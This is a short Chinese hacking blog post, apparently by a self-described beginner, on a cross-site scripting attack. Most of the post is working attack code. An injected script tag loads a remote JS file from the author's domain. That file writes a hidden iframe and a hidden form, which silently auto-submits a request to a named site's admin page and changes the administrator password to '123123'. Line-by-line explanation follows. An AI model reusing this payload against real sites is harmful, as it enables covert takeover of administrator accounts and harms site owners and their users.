今日跨站时,懒得写AJAX代码,想到了利用FORM target属性 + iframe来模拟恶意表单提交动作。
XSS代码:
<script language='javascript' src='http://www.sswowo.com/hide.js'></script>
//恶意注入的XSS代码 引用了远程我们自己编写的JS脚本
hide.js
//以下是hide.js脚本的内容:
document.write('<iframe name="hidden_frame" id="hidden_frame" style="display:none"><\/iframe><form action="http://www.spring-design.cn/admin/Admin_modify.asp?id=1" method="post" enctype="application/x-www-form-urlencoded" name="xss" target="hidden_frame"><input type="hidden" name="modify" value="yes" \/><input type="hidden" name="pass" value="123123" \/><input type="hidden" name="pass1" value="123123" \/><\/form>');
document.forms['xss'].submit();
首先我们利用document.write将我们需要用到的代码输出到页面上。下面是代码解释:
<iframe name="hidden_frame" style="display:none"></iframe>
//这里写了一个隐藏的 IFRAME, 设置style="display:none" 设置不显示。 还有设置 NAME=“hidden_frame” 在表单的 target属性时需要用到
<form action="http://www.XXXXX-XXXXXX.cn/admin/Admin_modify.asp?id=1" method="post" enctype="application/x-www-form-urlencoded" name="xss" target="hidden_frame">
//设置好提交地址,还有一点在于 FORM 的 NAME='XSS' 这里等下我们 用JS自动提交表单时 需要用到 ,主要的是 target="hidden_frame" 设置在 hidden_frame 里执行我们的提交动作。起到隐藏提交作用。
我们这里设置在 iframe 里面执行提交动作,那么我们本页面就不会刷新,页面也不会被重定向到提交地址,而iframe 我们又设置了不可见。 其实用挂马常用的 宽度高度=0 是一样可以的。
<input type="hidden" name="modify" value="yes" /> //构造的提交参数和值
<input type="hidden" name="pass" value="123123" /> //构造的提交参数和值
<input type="hidden" name="pass1" value="123123" /> //构造的提交参数和值
</form>
以上表单的作用是实现提交一个密码修改表单的功能。
最后:document.forms['xss'].submit(); 提交 NAME=“XSS” 的表单。
其实谈不上原创, 只是自己想出来的另外一条 小道道。。。
作为一个菜鸟,我感到很大的鸭梨!!!